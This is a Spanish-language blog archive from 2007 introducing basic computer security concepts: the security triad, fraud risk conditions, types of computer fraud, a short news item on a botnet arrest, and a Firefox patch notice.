Son varias las personas involucradas.
Se planifica a alto nivel.
Los controles relacionados son débiles.
Existe la posibilidad de venta de datos o software a terceros.
No se someten a auditorías especializadas.

Como estamos viendo en estos post, la importancia de los fraudes, desde siempre el hombre fue engañado por estos y día a día se ve más habitual.

Condiciones que aumentan el riesgo de Fraude

2007-12-01T11:46:00.000-03:00

Implica los contextos que facilitan la comisión del fraude, o sea condiciones inadecuadas para el desenvolvimiento de las tareas informáticas:

Administración controlada por una o pocas personas sin supervisión gerencial.
Estructura organizacional compleja, sin clara definición de autoridad y responsabilidad.
Alta rotación del personal clave.
Plantel insuficiente durante períodos prolongados.
Cambios de auditores frecuentes.
Actividad de la empresa cambiante (aumenta o decrece rápidamente) que implica aumento de las fallas.
Operaciones sin autorización formal.
Archivos sujetos a ajustes frecuentes, operaciones no contabilizadas o no conciliadas.
Documentación insuficiente o desactualizada de programas y sistemas.
Cambios frecuentes de programas, sin documentar, autorizar y probar.
Existencia de puntos débiles para acceder al sistema.
Falta de destrucción adecuada de la información en desuso (listados, carbónicos, etc.)
Personal de Sistemas que es especialmente sensible a la presión o extorsión.
Sistemas Operativos con bajos niveles de Seguridad.
Métodos criptográficos accesibles o insuficientemente aplicados.

Detenido grupo de crackers que controlaban 1 millón de PCs Zombies

2007-11-30T11:24:00.000-03:00

La policía neozelandesa desarticuló un grupo de Crackers expertos en el uso de botnets para controlar ordenadores de usuarios.

El jefe del grupo era un conocido cracker que operaba bajo el nick de Akill y que residía en Nueva Zelanda.

La operación fue realizada conjuntamente con la policía local y el FBI. En total fueron detenidos unas 13 personas incluyendo el responsable máximo de la red.

La policía informó que el grupo era responsable de daños por valor de 20 millones de dólares y que controlaban un millón de ordenadores esparcidos por todo el mundo. Los propietarios de los equipos desconocían que estos ejecutaban desde ataques a envíos masivos de spam comportándose normalmente en su actividad.

Artículo completo Segu-Info

Seguridad en la Web - Introducción

2007-11-29T16:10:00.000-03:00

La seguridad en web tiene 3 etapas primarias:

1) Seguridad de la computadora del usuario
2) Seguridad del servidor web y de los datos almacenados ahí
3) Seguridad de la información que viaja entre el servidor web y el usuario

Seguridad de la computadora del usuario
Los usuarios deben contar con navegadores y plataformas seguras, libres de virus y vulnerabilidades. También debe garantizarse la privacidad de los datos del usuario.

Seguridad del servidor web y de los datos almacenados ahí
Se debe garantizar la operación continua del servidor, que los datos no sean modificados sin autorización (integridad) y que la información sólo sea distribuida a las personas autorizadas (control de acceso).

Seguridad de la información que viaja entre el servidor web y el usuario
Garantizar que la información en tránsito no sea leída (confidencialidad), modificada o destruida por terceros. También es importante asegurar que el enlace entre cliente y servidor no pueda interrumpirse fácilmente (disponibilidad).

Fraudes Informáticos

2007-11-29T13:41:00.000-03:00

Para entender mejor, se pueden clasificar los fraudes que se cometen en los sistemas informáticos, o sea las acciones que conducen al delito y, consecuentemente, al perjuicio económico de alguien por quien perpetra el fraude. Los más comunes son:

Manipulación indebida, falsificación o alteración de registros y documentos.
Supresión u omisión de los efectos de la transacción en los registros o documentos.
Registración de transacciones inexistentes.
Uso indebido de las políticas contables.
Malversación de los activos.

Perfíl del Delincuente Informático

2007-11-28T01:12:00.000-03:00

Dado que los delitos que se cometen son nuevos, su perfil también lo es. En general tienen las siguientes características:

No tienen antecedentes delictivos previos en otros rubros.
En su gran mayoría son varones; las mujeres se encuentran implicadas sólo a nivel de complicidad.
El rango de edad está entre los 18 y 30 años.
Pocas veces actúan en asociación, suele haber un solo ejecutor y a lo sumo una o dos personas de apoyo.
Todos tienen un conocimiento altamente especializado.
Suelen comenzar como un desafío a los límites que pone el computador para su acceso y luego derivan al delito económico.

Delito Informático

2007-11-28T01:05:00.000-03:00

Con el término Delito Informático aglutinamos los hechos que, basándose en técnicas o mecanismos informáticos, pudieren ser tipificados como delito en el Código Penal, tales como: delito de estafa, delito contra la propiedad intelectual e industrial, etc. Debido a los avances tecnológicos y a los nuevos mecanismos para delinquir se ha hecho necesario introducir y modificar determinados artículos que permitan aglutinar éstos.

Nuevo Firefox 2.0.0.10 corrige tres vulnerabilidades

2007-11-27T23:14:00.000-03:00

Mozilla ha presentado hoy la versión 2.0.0.10 de Firefox que corrige tres vulnerabilidades, entre ellas la del manejo de esquemas jar, que afectaba al navegador desde hace diez meses.

fuentes: Kriptopolis

Amenazas, Vulnerabilidadades y Ataques

2007-11-26T02:24:00.000-03:00

El concepto de Amenazas en informática determinan cuáles deben ser las orientaciones de las medidas de seguridad a adoptar. El grado de susceptibilidad y el efecto que un sistema informático tiene cuando la Amenaza se convierte en realidad es lo que llamamos Vulnerabilidad. Ahora bien las Amenazas se convierte en realidad a través de un Ataques.

De acuerdo al estado actual de la tecnología, se pueden conjugar estos tres elementos para formar una tabla orientativa.

Los Riesgos en general no sólo están dados por la presencia de personas que perpetran los delitos sino por la ineficiencia generada por una mala administración o por un deficiente diseño y mantenimiento de los Sistemas que no consideran esta posibilidad.

Los 3 principios de la Seguridad Informática

2007-11-25T00:16:00.000-03:00

Este punto es muy importante conocerlos, principios muy simples de entenderlos y aplicarlos.

Principio 1: "El intruso al sistema intentará cualquier artilugio que haga más fácil su acceso y posterior ataque. El ataque siempre se realizará en el punto débil".

Principio 2: "Los datos deben protegerse sólo hasta que pierdan su valor". Este caso se ve en los grandes sistemas que proporcionan muchos datos procesados, quizás estos tengan valor para el usuario solo hasta un determinado momento, luego van perdiendo importancia.

Principio 3: "Las medidas de control que se implementen deben ser efectivas, eficientes, fáciles de usar y apropiadas al medio". Estas medidas deben funcionar en el momento oportuno y deben ser actualizados periódicamente, de lo contrario pasaría a ser un gasto inútil.

Seguridad Activa y Pasiva

2007-11-24T15:22:00.000-03:00

Seguridad Activa: es aquella cuyas medidas tienen como objetivo anular o reducir los riesgos existentes o sus consecuencias para el sistema; ejemplo antivirus, firewall, etc.

Seguridad Pasiva: es aquella que prepara al sistema para el caso en que el desastre que amenazaba el riesgo se haya producido; ejemplo, sistemas de back-up.

Seguridad Física y Lógica

2007-11-24T11:43:00.000-03:00

Seguridad Física: Este concepto hace referencia a la protección frente a las amenazas físicas de las instalaciones, equipos, datos, software de base y aplicativos, personal y documentación fundamentalmente. Para ello se recomienda realizar un diseño de las instalaciones, restricción de acceso de personal al área de sistemas, implementar un plan de Backup para los datos, etc.

Seguridad Lógica: Básicamente es la protección de la información, en su propio medio contra robo o destrucción, copia o difusión. Para ellos puede usarse la Criptografía, Firma Digital, Administración de Seguridad y limitaciones de Accesibilidad a los usuarios, más adelante veremos estos conceptos en profundidad.

Objetivos de la Seguridad Informática

2007-11-23T23:35:00.000-03:00

Básicamente los Objetivos de la Seguridad Informática se pueden resumir como los siguientes:

Confidencialidad: Que la información llegue en cantidad, calidad y oportunidad sólo y a todos los que está previsto.

Integridad: Se refiere a que la información producida tiene los contenidos en calidad y cantidad con que fue diseñada (contrario a fraude).

Disponibilidad: Es la oportunidad en la cual se dispone de la información. Completa el concepto de Integridad.

Importancia de las Fallas Informáticas

2007-11-23T23:23:00.000-03:00

Porqué es tan importante contemplar estas fallas:

Por la multiplicidad de uso de los sistemas informáticos, que abarcan prácticamente todo el espectro administrativo técnico de una empresa.
Por la falta de los procedimientos alternativos, que normalmente se desechan al implementar Sistemas informatizados.
Por el software amigable, que da acceso a informaciones y procesos importantes a quienes no siempre están capacitados para usarlos.
Por la expansión del propio trabajo, lo cual implica una mayor dificultad en el control al disponerse de herramientas que no se dominan totalmente.
Por el fácil acceso a grandes volúmenes de información, lo que produce la dicotomía de limitarlo y perder eficiencia o liberarlo y dejar la Seguridad al albedrío del usuario.

Seguridad - Introducción

2007-11-23T01:45:00.000-03:00

Podemos entender como Seguridad un estado de cualquier sistema (informático o no) que nos indica que ese sistema está libre de peligro, daño o riesgo.

Se entiende como peligro o daño todo aquello que pueda afectar su funcionamiento directo o los resultados que se obtienen del mismo. Para la mayoría de los expertos del tema el concepto de seguridad en la informática es utópico porque NO existe un sistema 100% seguro y de eso seguramente trataremos más adelante.

Para que un sistema se pueda definir como seguro debemos de dotar de cuatro características al mismo:

Integridad: La información no puede ser modificada por quien no está autorizado
Confidencialidad: La información solo debe ser legible para los autorizados
Disponibilidad: Debe estar disponible cuando se necesita
Irrefutabilidad: (No-Rechazo o No Repudio) Que no se pueda negar la autoría.

En estos momentos la Seguridad Informática es un tema de dominio obligado por cualquier usuario de la Internet y de los sistemas informáticos, para no permitir que su información sea robada y usada sin autorización.

Seguridad Segura

2007-11-23T01:08:00.000-03:00

Antes que nada queríamos darle una bienvenida a todos ustedes! Les comentamos básicamente de que se trata este nuevo Blog.

Junto a un amigo Gustavo (Barnisimo) desde hace tiempo ya veníamos pensando en algunos proyectos acerca de Seguridad Informática, tratando de cubrir varios aspecto referente a este tema, ir mostrando conceptos, prácticas realizadas, amenazas que pueden llegar a sufrir nuestros sistemas y organizaciones.

En fin, el objetivo nuestro es brindarle de alguna forma un lugar y un espacio en donde podamos aprender y entender muchas de las cuestiones de Seguridad Informática de las que hasta el día de hoy no conocemos.

A partir de ahora Barnisimo y yo (Danyx) les damos las bienvenidas y ojalá podamos formar un gran equipo de conocimiento junto a todos ustedes.